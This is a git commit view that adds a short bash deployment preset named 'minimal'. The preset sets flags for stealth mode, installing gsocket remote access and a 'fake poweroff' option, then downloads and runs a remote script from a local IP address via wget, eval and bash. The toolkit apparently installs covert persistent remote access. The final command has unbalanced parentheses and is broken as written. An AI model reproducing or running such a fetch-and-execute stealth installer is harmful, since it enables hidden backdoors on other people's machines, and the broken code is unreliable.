refactor some scripts

This commit is contained in:
2025-04-06 20:20:23 +03:00
parent 01d459b467
commit f86e170184
7 changed files with 595 additions and 617 deletions

12
scripts/deploy/minimal Executable file
View File

@@ -0,0 +1,12 @@
#!/bin/bash
# Minimal installation preset - no root required
export NO_ROOT=true
export NO_SERVICES=true
export INSTALL_WOL=false
export INSTALL_FAKE_POWEROFF=false
export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script
eval "$(wget -qO- http://192.168.0.104/deployment/y" | bash